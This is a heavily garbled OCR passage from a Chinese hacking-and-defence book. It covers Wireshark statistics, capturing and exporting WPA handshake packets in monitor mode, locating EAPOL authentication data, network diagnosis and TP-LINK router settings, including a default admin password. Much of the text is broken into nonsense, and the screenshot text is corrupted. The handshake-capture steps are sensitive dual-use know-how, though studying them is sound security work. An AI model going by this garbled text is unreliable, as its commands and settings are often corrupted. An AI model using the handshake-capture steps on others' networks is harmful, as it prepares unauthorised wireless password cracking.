事件 、 捕 获 、 接 口 等 信息 ， 如 下 图 所 示 。 
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Wireshark -六 区 文 件 才 性 ,tcp.pcapng eee 


Ee 和 
Exhemet 


分 组 大 小 归 制 
262144 字 区 


Bp | on 


[se 图 选择 “统计 ”菜单 ， 在 弹出 的 菜单 列 
表 中 选择 “协议 分 级 ”菜单 命令 ， 打 开 “ 协 
议 分 级 统计 ”对 话 框 ， 如 下 图 所 示 ， 从 这 
里 可 以 统计 出 每 一 种 协议 在 整个 数据 包 中 
占有 率 。 


~ 复制 到 到 村 | 关 close | 保存 注 村 


Oe PE 


[step 图 选择 “统计 ”菜单 ， 在 弹出 的 菜单 列 
表 中 选择 “对 话 ” 菜 单 命 令 ， 打 开 如 下 图 
所 示 的 对 话 框 ， 其 中 包括 以 太 网 、IPv4、 
IPv6、TCP、UDP 等 不 同 协议 会 话 信息 。 


Wes Comet ora 


TT 


[Sep 加 选择 “统计 ”菜单 ， 在 弹出 的 菜单 列 
表 中 选择 “端点 ”菜单 命令 ， 打 开 如 下 图 
所 示 端 点 对 话 框 ， 其 中 包含 以 太 网 和 各 种 
协议 选项 。 
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Wireshark -Endpoints .tcp.pcapng eee 

Ethemet4 | Ipv4-31 IPy6-2 TCP-145 UDP 133 
Address “Packets [Bytes TxPackets TxBytes Rxpackets RexBytes 
33:33:00:.00:00:16 2 180 0 0 2 180 
eB:4e0628:ae:46 3312 958k 1807 Dsk 1505 780k 
14:83:cd:33:60:73 3313 958k 1508 780k 1805 mk 
十 作 作 任 作 性 3 16 9 9 3 126 

解析 名 和 县 示 过 沪 吕 的 玉 制 Endpolnt 要 型 - 
目 Hep FEE 


[step 国 选择 “统计 ”菜单 ， 在 弹出 的 菜单 列 
表 中 选择 “分 组 长 度 ” 菜 单 命令 ， 打 开 如 
下 图 所 示 的 分 组 长 度 对 话 框 ， 这 里 可 以 对 
不 同 大 小 数据 包 进 行 统计 。 


wishark Packet Lengths .tcp.peapng ee0 
Topie Hem Count Average Min val Max val Rate (ms) Percent Burst rate Burst start 
Pocket Lona 3315 289.15 42 1514 0.0243 100% L6200 134.305 
O19 o ~ -00000 000% - 
20-39 日 > 0.0000 0.00% 
40.79 222 6350 42 79 00156 6401% 14500 134342 
B01s9 372 10534 80 159 00027 1122%9 01200 77159 
160-319 150 21317 160 312 。 00011 452% 0.0500 131903 
320.6399 173 47935 323 625 。 00013 S22% 0.0600 90.234 
640-1279 108 86793 640 1270 00008 326% 0D0400 65397 
1280-2559 390 147687 1306 1514 0.0029 1176% 03400 13L015 
2560.5119 0 0.0000 0.00% 
Sl20 and greter 0 00000 000% ~ 
由 从 过 外人，Entr 3 Play TU ra 
自制 另存 为 ~ close 


选择 “统计 ”菜单 ， 在 弹出 的 菜单 列 
表 中 选择 “LO 图 表 ” 菜 单 命 令 。 打 开 如 下 
图 所 示 的 IO 图 标 对 话 框 ， 其 中 包括 一 个 坐 
标 轴 显 示 的 图 表 ， 下 方 可 以 添加 任意 的 协 
议 ， 也 可 以 选择 协议 显示 的 颜色 ， 还 可 以 
调整 坐标 轴 的 刻度 。 


Wireshark-|0 图 要 .teppeapng ee 


Wireshark10 图 表 : tcp.pcapng 


Pacietsnl 输 


a) 
Amanuzr mh 
ased (GraphNeme DipiFiter Color Syie Yhts Fed SMAbered 

vy 所 有 人 名 DD be Nene 
Er -xm mm 下位 
Bre CE 


[step 国 选择 “统计 ”菜单 ， 在 弹出 的 菜单 列 
表 中 选择 “流量 图 ”菜单 命令 ， 打 开 如 下 
图 所 示 的 流量 图 对 话 框 ， 其 中 包括 通信 时 
间 ， 通 信 地 址 、 端 口 以 及 通信 过 程 中 的 协 
议 功能 ， 非 常 清晰 明了 。 


2 


aee 
pr sae sn 


pe 


[step 图 选择 “统计 ”菜单 ， 在 弹出 的 菜单 列 
表 中 选择 “流量 图 ”菜单 命令 ， 打 开 如 下 
图 所 示 的 TCP 流 图 形 对 话 框 ， 在 其 中 可 以 
根据 实际 需要 设置 相应 的 显示 ， 还 可 以 切 
换 数 据 包 的 方向 。 


覃 时 重 对 于 192168.0110;44786 ? 80.239.178.19:80 (MA) © 


在 吐 量 对 于 192.168.0.110:44786 > 80.239.178.19:80 (MA) 


teppapng 
24 > 
16 3 
二 
oa 时 
16 导 
24 = 

要 3 5 广 
Tmels) 

+ EEE io 

类 型 大 时 量 MA Window(s) |1000000 | 流 1 > 切换 方向 

最 标 | 时 辣 /到 到 (Stevers) | Y 也 长 仁 v 理 叶 量 。 详 际 奇 叶 量 复位 


eptrace) | 
OR | 


[Se | asweAs- 


12.4 ”实战 演练 


实战 演练 1 一 一 筛选 出 无 线 网 络 中 的 握手 
信息 


筛选 无 线 通信 中 握手 信息 可 以 通过 以 
下 几 个 步骤 完成 。 
将 网 卡 置 入 monitor 模式 ， 使 用 iw dev 
wlan0 interface add wlan0mon type monitor 


命令 将 网 卡 置 入 monitor 模式 ， 如 下 图 所 示 。 


root@kali:-# iv dev Wan interface add wlanenon type moritor 
rootekali:-# ivconfig 
wlanenon IEEE 892.11 Mode:Honitor Tx-Power=20 dBm 

Retry short long Limit:2 RTS thr:off 
Power Managenent:off 


Fragment thr:off 


wlang IEEE 892.11 ESSID:off/any 

Wode :Managed Access Point: Not-Associated 
Retry short long limit:2 RTS thr:off 
Encryption key:off 

power Management:off 


Ty-Power=28 dBm 
Fragment thr:off 


lo no wireless extensions 


ethe 


[step 图 使 用 ifconfig wlan0mon up 命令 ， 将 
新 创建 的 无 线 网 卡 启 动 ， 如 下 图 所 示 。 


no wireless extensions 


rootBkall:-# ifconfig wlanenon up 
root@kali:-# ifconfig 
eth9; flags=4163<UP, BROADCAST, RUNNING, MULTICAST> mtu 1598 

iner6 eae::20c:291f:fe7f:3972 prefixlen 54 scopeid 9x26<link> 


ether 00:Bc:29:7f:39:12 txquevelen 1809 (Ethernet) 
RX pachets 14827 bytes 20048396 [19.1 MiB) 
RX errors © dropped 9 overruns 日 frane 日 

Tk packets 4945 bytes 311322 (304.9 KiB) 

Tx errars 8 dropped B overruns @ carrier 8 collisions @ 


lo: flags=73<UP, LOOPBACK,RUNMING> mtu 65535 
inet 127.8.0.1 netnask 255 .6 
iner6 ::1 prefixlen 128 scopeid ex1l9<host> 
loop txqueuelen lege {Local Loopback) 
mx pachets 164 bytes 8356 (3.1 KIS) 
RX errors @ dropped 9 overruns 9 frane 日 
Tk packets 164 bytes 8356 (9.1 KiB) 
Tk errars @ dropped 9 overruns @ carrier @ collisions @ 


Wlanonon: flags=4163<UP, BROADCAST,AUNNING, MULTICAST> mcu 1500 
unspec EB-4E-0628-AE-46-00-98-60"00-80-09-66-00-66-00 txqueuelen 1988 (UNSPEC) 
Rx packets 102 bytes 15139 (14,7 KiB) 
RK errors @ dropped 9 overruns @ frane 日 
Tx packets © bytes © (8.0 8) 
T errors @ dropped 9 overruns @ carrier @ collisions @ 


step 园 启动 wireshark 抓 包工 具 ， 
wlan0mon 无 线 网 卡 ， 如 下 图 所 示 。 


选择 


Capture 


-using this filter: | 而 | Entera capture filter 


ethO 
[vonmn | 

ny 

Loopback: lo 

nflog 


Learn 


[step 图 在 抓 取 到 的 数据 包 中 筛选 并 标记 出 握 
手 信息 数据 包 ， 如 下 图 所 示 。 


Prolocol Length Info 
802.11 16R 


Destinatlon 
VivoMobi 


862.11 10M 
802.11 
802.11 
802.11 


Ionledgemet 
16 Request 
16 Request 
:23:b2:a8:f3: 46 Request 
882 .11 
802.11 


16 Request ro-send, 
16 Request -to-send, 


step 图 选择 “文件 ”菜单 ， 在 弹出 的 菜单 中 
选择 “导出 特定 分 组 ”菜单 命令 ， 导 出 标 
记 后 的 握手 信息 数据 包 ， 如 下 图 所 示 。 


Wireshark . Export Specified Packets © 
ED 局/root -+*++ 和 ms 
a 名 称 了 大 小 类 型 日 期 被 修改 “ 
图 ,ooe | Desktop Folder ”2018/L. 上 午 
局 Documents Folder 2018/L. 上 午 
a Downlonds Folder 2018/L. 上 和 
人 Music Folder 。 201BIL_ 上 年 | 
局 pictures Folder 。 20181L- 上 午 | 
Publc Folder 。 20181L 上 年 = 
ES 
文件 名 各 IN) :|test | 5) 
Ganeel 
Exportas Wireshargtcpdump/- - pcap Belp 
Packet Range Compress with gzip 


Captured © Displayed 


All packets 8975 
Selected packets only 5 
® Marked packetsonly § 
First to least marked 3 
Range: o 
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实战 演练 2 一 一 快速 定位 身份 验证 信息 数 
据 包 

通过 Wireshark 抓 取 到 整个 握手 过 程 数 
据 包 后 ， 如 何 精确 定位 到 身份 验证 数据 包 
呢 ， 用 户 可 以 通过 以 下 步骤 快速 定位 。 
[step 轩 通过 Wireshark 打开 抓 取 到 的 握手 信 
息 数 据 包 ， 如 下 图 所 示 。 


Open 


lroot/wap-01.cap (258 KB) 


筛选 条 件 文本 框 中 输入 eapol 筛选 
条 件 ， 如 下 图 所 示 。 


区 
| 一 3 Er 


”按钮 ， 即 可 展开 


[Step 图 单 击 右 侧 的 “ 
身份 验证 信息 ， 如 下 图 所 示 。 


2.11 QoS Data, Flags: 
cal-Link Control 
~ 862.1X Authentication 
Version: 882.1X-2684 (2) 
Type: kay (2) 
Lengrh: 199 
Key Descriptor Type; EAFOL RSk Key (2) 
[essage nunber: 3] 
» Key Information; 6x13ca 
Key Lengrh: 16 
Replay Counter; 2 
WPA Key Nonce: 56ehegeB11facdc2n4453356ddd9973f3cg5n73cbae58df1 
Key IV: 0686669068066866660606066896660 
WPA Key RSC: 6B998BB669699B99 
WPA Key ID: 6689668966866689 
WPA Key MIC: d7e1519dad858ffha31989fbfs7ecd8 
WPA Key Data Length; 194 
WPA Key Data: a45459445287eeg06c785an3B18c156aBe672679B4749978 


12.5 “小 试 身手 

练习 1: 诊断 和 修复 网 络 不 通 的 问题 
当 自 己 的 计算 机 不 能 上 网 时 ， 说 明 计 咒 

算 机 与 网 络 连接 不 通 ， 这 时 就 需要 诊断 和 

修复 网 络 了 ， 有 具体 的 操作 步骤 如 下 。 

[Ses 国 打开 “网 络 连接 ”窗口 ， 右 击 需 要 

诊断 的 网 络 图 标 ， 在 弹出 的 快捷 菜单 中 选 

择 “ 诊 断 ” 菜 单 命令 ， 弹 出 “Windows 网 

络 诊断 ”窗口 ， 并 显示 网 络 诊 断 的 进度 ， 

如 下 图 所 示 。 
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黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


司 Windows MS 


正在 检测 问题 


EBD 


[Eee 图 诊断 完成 后 ， 将 会 在 下 方 的 对 话 框 中 
显示 诊断 的 结果 ， 如 下 图 所 示 。 


司 Windows 网 络 诊 新 
其 余 修复 操作 需要 具有 管理 员 权限 


3 到 有 是 
矣 本 器 以 大 网 "已 可 用 四 


外 涯 试 以 管理 员 身份 进行 这 些 修复 
全 济 星 其 他 选 吓 


全 看 给 信息 


| 攻 
单 击 “ 尝 试 以 管理 员 身份 进行 这 些 修 
复 ” 链 接 ， 即 可 开始 对 诊断 出 来 的 问题 进 
行 修复 ， 如 下 图 所 示 。 


司 Windows 网 络 诊断 


正在 解决 问题 
正 站 验证 是 天 已 由 网 络 适 配 甘 配 千 同 是 


Eee 辆 修复 完毕 后 ， 会 给 出 修复 的 结果 ， 提 
示 用 户 疑 难 解答 已 经 完成 ， 并 在 下 方 显示 
已 修复 信息 提示 ， 如 下 图 所 示 。 
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司 windows 网 者 涌 新 


疑难 解答 已 过 成 


结 壬 本 答 已 对 系统 进行 了 一 些 更 改 。 商 罕 汪 之 前 鲁 涯 试 执行 的 任务 . 
HR 本 
于 -以 太 风 "已 二 用 已 复 加 


一 关闭 疑难 解答 
一 浏览 其 他 选项 


到 大 关 算 信 息 


在 无 线 局 域 网 中 所 有 的 终端 设备 都 是 鹿 
通过 路 由 器 上 网 的 ， 为 了 更 好 地 管理 各 个 
终端 设备 的 上 网 情况 ， 管 理 员 可 以 通过 路 
由 器 控制 上 网 设备 的 上 网 速度 ， 具 体 的 操 
作 步 又 如 下 。 

[Ee 打开 路 由 器 的 Web 后 台 设置 界面 ， 在 
其 中 选择 “IP 宽带 控制 ”选项 ， 在 右 侧 的 窗 
格 中 可 以 查看 相关 的 功能 信息 , 如 下 图 所 示 。 


ee 条 
EN 


1 时， 二 全 人 志和， 由 二 ， 南 WE 扩 


EE 
[te 图 选中 “开启 了 宽带 控制 ” 复 选 框 ， 
即 可 在 下 方 的 设置 区 域 中 对 设备 的 上 行 总 
宽带 和 下 行 总 宽带 数 进行 设置 ， 进 而 控制 
终端 设置 的 上 网 速度 ， 如 下 图 所 示 。 


第 13 音 ”无 线路 由 器 及 密码 的 
安全 防护 
在 无 线 网 络 中 ， 能 够 发 送 与 接收 信号 的 重要 设备 就 是 无 线路 由 器 了 ， 因 此 ， 对 无 线路 


由 器 进行 安全 防护 ， 就 等 于 看 紧 了 无 线 网 络 的 大 门 。 本 章 介绍 无 线路 由 器 及 密码 的 安全 防 
护 ， 主 要 内 容 包括 无 线路 由 器 的 基本 设置 、 无 线路 由 器 的 密码 破解 以 及 无 线路 由 器 的 安全 


防护 技巧 及 工具 的 应 用 等 。 


13.1 无 线路 由 器 的 基本 设置 


无 线路 由 器 相信 大 家 都 不 陌生 ， 但 是 
懂得 如 何 设置 的 却 不 多 ， 本 节 针 对 家 用 无 
线路 由 器 的 设置 进行 讲解 。 


绝招 1: 通过 设置 向 导 快速 上 网 

目前 多 数 家 用 型 无 线路 由 器 都 提供 了 
网 页 进入 页 面 ， 当 用 户 登 录 路 由 器 后 会 提 
供 一 个 向 导 ， 通 过 向 导 设置 可 以 最 快 地 实 
现 连接 外 网 。 家 用 路 由 器 背面 会 有 路 由 器 
型 号 、 路 由 器 王 〈 进 入 路 由 器 的 地 址 ) 、 管 
理 员 账号 密码 等 信息 。 


深圳 市 蕉 联 技术 有 了 


TP-LINK 


通过 向 导 设 置 路 由 器 并 进行 上 网 的 具 
体操 作 步 又 如 下 。 

Estee 加 打开 相 浏览 器 ， 在 地 址 栏 中 输入 路 
由 器 的 网 址 ， 一 般 情 况 下 路 由 器 的 默认 网 
址 为 192.168.0.1。 输入 完毕 后 , 单 击 “ 转 至 ” 
按钮 ， 即 可 打开 路 由 器 的 登录 窗口 ， 如 下 
图 所 示 。 


TwnaasN x 下 = 
所 © | wo 廊 | 至 殉 馈 … 
TP-LINK 

请 输 音 员 密码 

| 

EDI 


step 图 在 “请 输入 管理 员 密 码 ”文本 框 中 给 


入 管理 员 的 密码 ， 默 认 情 况 下 管理 员 的 密 
码 为 “123456”， 如 下 图 所 示 。 


本 


口 TLwneesh x 霹 - 0 
€ > O | ma wl 
TP-LINK 

答 入 管理 负 密 码 

eeeeee 

EE 


[ep 图 单 去 “确认 ”按钮 ， 即 可 进入 路 由 器 
的 “运行 状态 ”工作 界面 ， 在 其 中 可 以 查 
看 路 由 器 的 基本 信息 ， 如 下 图 所 示 。 


SS” 黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


TP-LINK 


EE 国 选择 “设置 向 导 ” 选 项 ， 即 可 进入 “ 设 
置 向 导 ” 页 面 ， 如 下 图 所 示 。 


本 向 导 可 访 轩 上 同 所 针 的 基本 网络 芝 娄 ， 户 音 而 “下 一 步 ” 维 续 。 苦 要 详 委 讼 
音素 大 由 能 或 芝 计 请 点 击 让 亿 相 关 术 目 、 


医 权 | 


[Eee 图 单 击 “ 下 一 步 ”按钮 , 进入 “设置 向 导 - 
上 网 方式 ”界面 , 在 其 中 选择 上 网 方式 , 其 中 ， 
PPPoOE 为 拨号 上 网 ， 一 般 由 运营 商 提供 具体 
账号 密码 ; 动态 全 和 静态 全 则 多 为 分 网 时 
使 用 ， 可 以 根据 实际 需求 选择 ， 如 下 图 所 示 。 
ER 


二 向 导 检 代 三 种 最 常见 的 上 同方 式 供 过 树 。 长 共 它 上 网 方式 ， 再 点 由 友 则 “网 
络 冲 玫 ” 中 “NANf 冯 置 "进行 去 置 * 如 果 趟 光 寻 使用 何 神 上 网 方式 ， 请 过 和 “让 
中 和 器 坟 计 经 上 同方 式 ”。 
二 让 治 男 剖 夫 二 托 上 网 万 式 《 必 ) 
EPE [NDS 这 号 
让 1 以 横生 自动 从 同 络 服务 沿 匀 了 IF 直 》 


逢 T? 1 以 太 P 近 于 ，RS 服 和 而 提供 证 地址》 
| 过 [过 


[ep 图 单 去“ 下 一 步 ” 按 钮 ， 进 入 “设置 向 
导 -无 线 设置 ”界面 ， 在 其 中 设置 路 由 器 无 
线 网 络 的 基本 参数 以 及 无 线 安全 ， 无 线 安 
全 选项 可 以 采用 WPA-PSK 方式 输入 密码 ， 
如 下 图 所 示 。 
TT 


由 六 无 妖 时 的 至 本 关闭 以 及 无 安全 。 


2 

Sam Eu | 
入 省 ; 

核 式 bgn mixed 9 

失 

无 二 有 全 入 古 : 


为 8 加 网 绝 窑 全 ， 台 将 符 开 让 天 线 安全， 并 作 有 VEA-TSXAPIG -TSK AT5M 主 方 
未 


不 开局 开关 安全 
® heheswrhe-k 
IspER: 
ees 人 CTR 字符 中 -64 二 十 六 进入 宇 ) 
不 恰 下 天 二 窑 全 法 到 


下 | [二 二 
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侈 注意 : 无 线 密码 的 长 度 不 能 小 于 8 个 字 
符 ， 和 否则 会 有 提示 ， 如 下 图 所 示 。 


192.168.1.1 显示 : 


未 PSK 密 码 长 度 不 能 小 于 8， 请 本 新 绽 入 ! 
禁止 此 页 再 显示 对 活性。 


[see 车 单 去 “下 一 步 ”按钮 ， 即 可 完成 向 导 
设置 ， 并 弹出 如 下 图 所 示 的 界面 。 


设置 完成 ， 单 击 “重启 ”后 路 由 器 将 重启 以 使 设置 生效 * 


提示 : 着 路 由 总 重启 后 仍 不 能 正常 上 网 ， 请 点 击 左 人 “网络 参数 ” 进 
入 “WAI 口 设置 " 栏目， 确认 是 否 设置 了 正确 WAy 口 连接 类 型 和 拓 号 模式 * 


|] [大 下 | 


[Eee 国 单 直 “重启 ”按钮 ， 重 启 路 由 器 ， 如 

下 图 所 示 ， 待 路 由 器 重启 完成 后 ， 就 可 以 

进行 上 网 了 。 
ms | 


配置 保存 成 功 ! 
正在 重新 启动 
3 


绝招 2: 网 络 参数 与 无 线 设置 


路 由 器 一 般 提供 网 络 参数 设置 ， 其 中 
包括 WAN 口 设 置 、LAN 口 设置 、MAC 地 
址 克隆 ， 同 时 无 线路 由 器 还 提供 无 线 设置 ， 
如 下 图 所 示 。 


LaAN 口 设置 
MAC 地 址 克隆 


网 络 参数 与 无 线 设置 的 操作 步骤 如 下 。 


主机 状态 


Estee 加 WAN 口 设 置 ， 主 要 包括 WAN 口 连 
接 类 型 , 这 个 与 向 导 设 置 中 的 3 种 类 型 相同 ， 
如 有 特殊 需要 可 以 设置 DNS 服务 器 ， 否 则 
保持 默认 即 可 ， 如 下 图 所 示 。 


[区 
Wi 连接 型 : hIP v EE 
itl vee 
SR on 
[3 ogon 
区 加 有: 
款 扣 TI 字 节 ): 。 [1500 ( 吉 认 是 1500,， 如 帮 必 要 ,请 入 外 ) 
口 手动 访 置 bs 服务 器 
| 
莒 月 DNS 服务 器 : [EL 【 司 这 )》 
EE [er ] 
站 单 拱 方 式 我 取 开 (一般 情 兄 下 测 各 议和 洗 ) 
保存 ] [本 肋 | 


LAN 口 设置 ， 主要 通过 子 网 掩 码 的 
设置 划分 内 网 网 段 ， 子 网 掩 码 的 设置 决定 
了 内 网 网 段 ， 同 时 也 确定 了 内 网 最 大 容纳 
设备 数量 ， 如 下 图 所 示 。 


LAN 吕 设置 


本 页 设置 LAN 口 的 基本 网 络 苦 数 。 

JUC 地 址 : 1C-FA-68-01-2F-08 

了 ?地址 192.168.11 

子 网 摘 码 : 552552550 了 
保存 | [ 才 助 


MAC 地 址 克隆 ， 这 里 可 以 对 路 由 器 
MAC 地 址 进行 克隆 ， 如 下 图 所 示 。 


本 页 设置 路 由 器 对 广 域 P89AC 地 址 * 
JUC 地 址 : 00-87-36-2F-D0-46 收 夏 出 三 MAC 
当前 管理 rcpac 地 址 : [587362FD046 离队 MAC 地 址 
注意 : 只 有 局 后 中 中 的 计算 机 才能 使 用 本 功能 * 
保存 ] [于 助 ] | 


[te 图 无 线 网 络 基 本 设置 ， 包括 SSID (网 
络 名 称 ) 号 、 信 道 、 通 信和 模式 以 及 频段 带 
宽 等 参数 ， 如 下 图 所 示 。 


本 页 面 设置 路 由 器 无 线 奖 络 的 基本 者 教 。 
ss: TP-LINK_O12F08 
信道: 自动 " 
模式 : 1ibgnmixed v 
频段 带宽 : 重 动 

四 开启 无 线 功能 

本 开户 ss 广播 

开启 WDS 
保存 | [帮助 
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[step 图 无 线 网 络 安全 设置 ， 包 括 4 种 方式 ， 

第 1 种 不 开启 无 线 安 全 ， 这 种 方式 除 测 
试 外 不 建议 使 用 ; 第 2 种 使 用 WPA-PSK/ 
WPA2-PSK 方式 ,一 般 建议 使 用 这 种 方式 ， 

是 目前 比较 主流 的 网 络 安 全 方式 ; 第 3 种 
是 WPA/WPA2 方式 ， 这 种 方式 同 第 2 种 类 
似 ， 只 是 加 密 方式 为 自 定义 ; 第 4 种 使 用 
WEP 方式 ， 该 方式 已 经 被 爆 出 存在 严重 安 
全 隐患 ， 除 测试 外 不 建议 使 用 , 如 下 图 所 示 。 


are no EL 
人 
Pr 4 方法 
TR 
本 at- 
Wa: [CE | 
ens: [5] 
pA EE 
人 
Em 
下 [Co | 
7 吉 愉 an， 更) 
wns 
Vir 7] 
[9 | 
fim ] 
wn [oem oa) 
i 
| 
区 
由 
WEB FEI 
[FA] 
sm 7 il 
sal En 
sm | 
到 | | 
地 BC 
区 可 区 可 


[Se 图 无 线 网 络 MAC 地 址 过 滤 设 置 ， 如 
果 开 启 MAC 地 址 过 滤 ， 只 有 添加 进来 的 
MAC 设备 可 以 正常 通信 ， 列 表 之 外 的 设备 
无 法 进行 通信 。 这 个 只 是 相对 的 ， 后 面 会 
讲解 如 何 通过 MAC 克隆 实现 通信 ， 如 下 图 
所 示 。 


二 页 半生 WWF 地 相对 于 六 拉 制 计算 机 村 本 无关 同 坟 的 访问 
Tur 地 址 大 力 能 : 已 关 间 。[ 斋 二 浊 束 ] 


tan 
时 寺 上 列 表 中 yc 寻 访问 本 天 娩 9 引 
人 许 列 天 中 生 让 cj 访问 本 无 给 


瑟 wr EE3 EE EE 
LE 
三 本 而 EE 5 面 C]] 


[step 图 无 线 高 级 设置 ， 其 中 有 Beacon 帧 
广播 间隔 时 间 ， 移 动 设备 通过 Beacon 帧 
检测 空间 中 存在 的 无 线路 由 器 ， 通 过 设置 
Beacon 帧 可 以 达到 隐藏 无 线路 由 器 的 效果 。 
当然 也 是 相对 的 ， 后 面 会 讲解 如 何 挖 出 隐 
藏 无 线路 由 器 ， 如 下 图 所 示 。 
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SS 黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


Beacon 时 楼 : 100 (40-1000) 
HTsH 重 : 2345 (1-2346) 
分 片 立 值 : 2346 《256-2346) 
ITD 师 值 : 1 (1-255) 

因 开启 BE 

图 开启 Short 6I 

日 开启 妇 隔 离 

保存 ] [部 助 


i 安全 设置 针对 一 些 可 能 遭受 的 网 络 攻击 
进行 防御 ， 家 长 控制 则 可 以 限制 未 成 年 人 浏 
览 固定 网 页 以 及 上 网 时 间 ， 如 下 图 所 示 。 


进行 安全 设置 与 家 长 控制 的 操作 步骤 
如 下 。 
[Eee 国 在 路 由 器 功能 列表 中 选择 “安全 设置 ” 
选项 下 的 “高 级 安全 设置 ”选项 ， 进 入 “高 
级 安全 选项 ”设置 界面 ， 在 其 中 可 以 进行 
相关 参数 的 设置 并 阅读 相关 注意 事项 ， 如 
下 图 所 示 。 


本 页 设置 高 织 安全 防范 配置 。 


注意 : 1、 只 有 启用 了 “Dos 攻击 防 范 ”， 后 面 的 设置 才能 够 生效 。 
2 \ 这 里 “数据 包 统计 时 间 间隔 "与 “系统 工具 ”- “流量 统 
中 的 “ 为 同一 值 ， 无 论 在 哪 一 个 模块 进 


站 
数据 包 统 计时 间 则 隔 : 


{5~60) 10v] 秒 
os 攻击 防范 : 加 不 启用 中 启用 
开启 IOG-FL00D 攻 击 过 源 : 
IO-PL00 数 据 包 靖 值 : 《5~3600) [50 也 /种 
开启 UDP-PLD0D 过 源 : 
MDP-PLO0D 数 据 包 闲 值 : (5~3600) 500 包 / 秒 
开启 TCF-SQFFLD0D 攻 击 过 虐 : 
TCP-SDFFLD0I 数 据 包 靖 值 : 《5~3600) [50 也 / 秒 
知 购 来 自 WAND 的 Ping: 
禁止 来 自 LAN 吕 的 Pins 包 通过 路 由 器 : 《防范 冲击 波 病 毒 


step 图 选择 “ 远 端 Web 管理 ”选项 , 进入 “ 远 
端 WEB 管理 ”设置 界面 ， 在 其 中 可 以 设置 
路 由 器 的 Web 管理 端口 和 广域网 中 可 以 执 
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行 远 端 Web 管理 的 计算 机 本 地 址 ， 在 设置 
前 请 阅读 相关 注意 事项 ， 如 下 图 所 示 。 


ei ee 


主意 : 。 1, 路 由 器 默认 的 WE 管理 淇 口 为 0， 如 果 您 改变 了 默认 的 WEB 管理 
讽 口 《例如 孜 为 66》 ， 则 交 必须 用 “工地 址 : 庙 口 ”的 方式 《例如 
http;//192.168. 1.1:88) 才能 登录 路 由 器 执行 WEB 界面 管理 。 此 功 
能 需要 重启 路 由 器 才能 生效 。 
路 直路 默认 的 光滑 Wrr 管 理 IT 地 直 为 .0.0 0， 在 此 时 认 杖 态 
下 ， 广 域 汉 中 所 有 计算 有 都 不 能 登录 路 由 器 执行 远 庙 WE 管理 ， 如 
条 您 改变 了 勒 认 的 运 端 VEE 管 理 IT 地 址 《例如 改 为 202.96 12.6) ， 
出 广域网 中 只 有 具有 指定 IP 地 址 《 例 jz02, 96. 18.9》 的 计算 机 才 
菜 登 录 路 由 吕 执 行 远 庙 VE 管理 。 如 果 将 远 庙 VEE 管 理 IF 地址 设 为 
到 Ee 255. 255， a 广域网 中 所 有 的 计算 机 都 可 以 登录 路 由 


a RS 转发 规则 ”中 虚拟 服务 器 条 目的 端口 产生 
A 当 您 保存 配置 时 ， 存 在 端口 串 突 的 虚 扒 服务 器 条 目 将 被 自动 


EB 管理 满口: 80 
元 滞 VEp 管 理 IT 地 址 : 0000 


确定 | [帮助 


[step 图 在 路 由 器 功能 列表 中 选择 “家 长 控制 ” 
选项 ， 即 可 进入 “家 长 控制 设置 ”界面 ， 
用 户 可 以 通过 本 页 面 控制 小 孩 的 上 网 行为 ， 
使 得 小 孩 的 计算 机 只 能 在 指定 时 间 访 问 指 
定 的 网 站 ， 如 下 图 所 示 。 


Ee 
不下 


We 再 不 和 用。 加 让 用 

FreeepHl ] 

uiEBrpywc:tll， TT [RG] 

保存 | 
= CC TT | Foy | We | RE 
ET 

ET en [ERE 
[EH 


单 击 “ 增 加 单个 条 目 ” 按钮 ， 进 入 “家 
长 控制 规则 设置 ”页 面 ， 如 下 图 所 示 。 本 
页 面 中 的 日 程 计划 基于 路 由 器 的 系统 时 间 ， 
用 户 可 以 在 “系统 工具 ”一 “时 间 设 置 ” 
中 查看 和 设置 系统 时 间 。 

ET EE 


二 页 设 关 一 条 家 控制 条 


下 本 4 的 上 了 计时 由 和 | 间 二 以 在 “天 工具-; 训 
ES 


cc 光 让 : ms! 

当 间 局 0 中 cuc 地 址 : 。 [请 这 著 一 。 

a mi [|] 

| 
CC |] 
| 
| IE 
i 
i 
i 
FF 

希 直 在 名 此 3 丛生 双 : 
郊 癌 以 在 “上 了 人 制程 计划 "中叶 时间 列 
才 

村 

[ES 


人 科 注 意 : 一 旦 开启 家 长 控制 功能 ， 不 在 规 
则 列表 中 的 计算 机 将 无 法 上 网 。 


上 网 控制 可 以 对 路 由 器 的 规则 、 主 机 
列表 、 访 问 目标 以 及 日 程 计划 进行 设置 ， 
路 由 功能 则 可 以 添加 路 由 表 。 
具体 的 操作 步骤 如 下 。 
step 回 在 路 由 器 功能 列表 中 选择 “上 网 控 
制 ” 选项 下 的 “规则 管理 ”选项 ， 即 可 进 
入 “上 网 控制 规则 管理 ”界面 ， 在 本 页 面 
用 户 可 以 打开 或 者 关闭 此 功能 ， 并 且 设 定 
默认 的 规则 。 更 为 有 效 的 是 ， 用 户 可 以 设 
置 灵活 的 组 合 规则 ， 通 过 选择 合适 的 “ 主 
机 列表 ”“ 访 问 目标 ”“ 日 程 计划 ”， 构 成 完 
整 而 又 强大 的 上 网 控制 规则 ， 如 下 图 所 示 。 


了 


UA 上 
Am 人 也 EN » 内 


请 


RR 
ompR pt 


Tm TT TT TT 
ET 

IE 

Ea ¥ sa [ 


[ej 


[ep 图 选择 “主机 列表 ”选项 ， 进 入 “主机 
列表 设置 ”界面 ， 在 其 中 可 以 设置 内 部 主 
机 列表 信息 ， 如 下 图 所 示 。 


主机 列表 疫 轩 
本 而 没 轩 内 部 主机 列 天 信息 


四 主机 名 主机 信息 EE3 
当前 下 为 宇 
所 加 单个 条 目 | [ 出 除 所 有 东 巨 
三 页 | [| 当 第 [LS 页 [更 助 ] 


[es 图 选择 “访问 目标 ”选项 ， 进 入 “访问 
目标 设置 ”页 面 ， 在 其 中 可 以 设置 访问 目 
标 信息 ， 如 下 图 所 示 。 

TT 


坟 页 证 访问 目标 信息 


EE EE 


I T 杷 | 
a 


rea Ed 


step 回 选择 “日 程 计划 ”选项 ， 进 入 “日 程 
计划 设置 ”界面 ， 在 其 中 可 以 设置 上 网 控 
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制 的 日 程 计划 ， 如 下 图 所 示 。 
[ewes 


本 页 设 香 上 网 过 制 的 日 各 计划 
wm EE 


Ey 时 间 Ea3 
有 列表 为 宇 


ET 
了 和 [| 页 


[step 图 选择 路 由 器 功能 列表 “路 由 功能 ” 选 
项 下 的 “静态 路 由 表 ” 选 项 ， 进 入 “静态 
